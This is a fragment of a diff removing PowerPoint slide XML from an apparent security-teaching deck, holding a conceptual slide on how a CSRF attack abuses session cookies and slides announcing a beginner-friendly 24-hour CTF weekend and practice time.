-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Our browser will send the cookies (which including the session id) to the vulnerable website’s server along with our request.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>As far as the poorly designed website is concerned, the victim user (identified by their session id) sent a request to change their email.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:pPr marL="285750" indent="-285750">
-              <a:lnSpc>
-                <a:spcPts val="2560"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="7" name="Picture 6">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E33D056-14AE-5D73-871C-973D5A05365A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3"/>
-          <a:srcRect/>
-          <a:stretch/>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="8809470" y="235067"/>
-            <a:ext cx="2989117" cy="243717"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5834BB2-234E-BDD1-E7AE-CD78CC5E6535}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="633984" y="1254616"/>
-            <a:ext cx="2830735" cy="1195199"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="l">
-              <a:lnSpc>
-                <a:spcPts val="4280"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="3600" b="1" spc="120" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="24272C"/>
-                </a:solidFill>
-                <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-                <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-              </a:rPr>
-              <a:t>Example - CSRF</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="3600" b="1" spc="120" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="24272C"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-              <a:cs typeface="Handjet Medium Square Single" pitchFamily="2" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="14" name="Picture 13">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D415EE0-B050-4CA8-A2B3-6BFF1B3D3E0A}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="3464719" y="2086547"/>
-            <a:ext cx="8505825" cy="2019300"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4254575939"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide13.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B5E059-5994-DBF7-AC04-B767191E9B5D}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BA756DF-171D-23B6-717F-32564679023C}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5979,538 +5094,7 @@
           <p:cNvPr id="10" name="TextBox 9">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D002C8-CC40-FE0D-6F22-238967E65159}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2747912" y="1106919"/>
-            <a:ext cx="6261812" cy="919482"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPts val="6000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>CTF</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t> Weekend!</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="6500" b="1" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="20" name="Picture 19">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E373E-2B45-DD01-4EC1-69D14129ED2F}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="-52426" y="6698054"/>
-            <a:ext cx="12296852" cy="166519"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="2" name="Picture 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74EDE1B2-AA06-4838-05EB-AC57A1D6F4EF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId5"/>
-          <a:srcRect/>
-          <a:stretch/>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="819301" y="524291"/>
-            <a:ext cx="10585095" cy="520900"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="6" name="Picture 5">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69353CBC-8AA8-4716-9ABD-CB3AB4F1A277}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId6"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="326165" y="1990351"/>
-            <a:ext cx="7109775" cy="4450003"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="14" name="TextBox 13">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A75ADE3E-68C0-4840-9009-D6084A412710}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="7500253" y="1997495"/>
-            <a:ext cx="4627434" cy="3693319"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="200000"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Saturday 30.11, 14:00</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="200000"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:effectLst/>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Will last for 24 hours</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="200000"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>No team size limit</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="342900" indent="-342900" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="200000"/>
-              </a:lnSpc>
-              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
-              <a:buChar char="•"/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Contains beginner friendly challenges</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="2400" b="1" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1021187848"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B5E059-5994-DBF7-AC04-B767191E9B5D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12192000" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D002C8-CC40-FE0D-6F22-238967E65159}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2965094" y="4337270"/>
-            <a:ext cx="6261812" cy="919482"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPts val="6000"/>
-              </a:lnSpc>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en-US" sz="6500" b="1" dirty="0">
-                <a:solidFill>
-                  <a:schemeClr val="bg1"/>
-                </a:solidFill>
-                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              </a:rPr>
-              <a:t>Practice time</a:t>
-            </a:r>
-            <a:endParaRPr lang="he-IL" sz="6500" b="1" dirty="0">
-              <a:solidFill>
-                <a:schemeClr val="bg1"/>
-              </a:solidFill>
-              <a:effectLst/>
-              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="20" name="Picture 19">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E373E-2B45-DD01-4EC1-69D14129ED2F}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="-52426" y="6698054"/>
-            <a:ext cx="12296852" cy="166519"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="2" name="Picture 1">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74EDE1B2-AA06-4838-05EB-AC57A1D6F4EF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId5"/>
-          <a:srcRect/>
-          <a:stretch/>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="819301" y="524291"/>
-            <a:ext cx="10585095" cy="520900"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="4" name="Picture 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9E494CD-45EB-20D5-25E7-31FAD1644ECD}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId6"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="5429250" y="2171772"/>
-            <a:ext cx="1333500" cy="1803400"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1060426137"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide15.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name=""/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5B5E059-5994-DBF7-AC04-B767191E9B5D}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="12192000" cy="6858000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="10" name="TextBox 9">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41D002C8-CC40-FE0D-6F22-238967E65159}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912386C1-D514-7DA8-9168-D11E9378171E}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6878,7 +5462,7 @@
           <p:cNvPr id="20" name="Picture 19">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D4E373E-2B45-DD01-4EC1-69D14129ED2F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5707DF0F-3593-D2B1-49FB-A295E7C8D056}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6908,7 +5492,7 @@
           <p:cNvPr id="2" name="Picture 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74EDE1B2-AA06-4838-05EB-AC57A1D6F4EF}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC78A562-3AF1-D6B1-9C87-456A09826D02}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -6935,7 +5519,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4051444837"/>
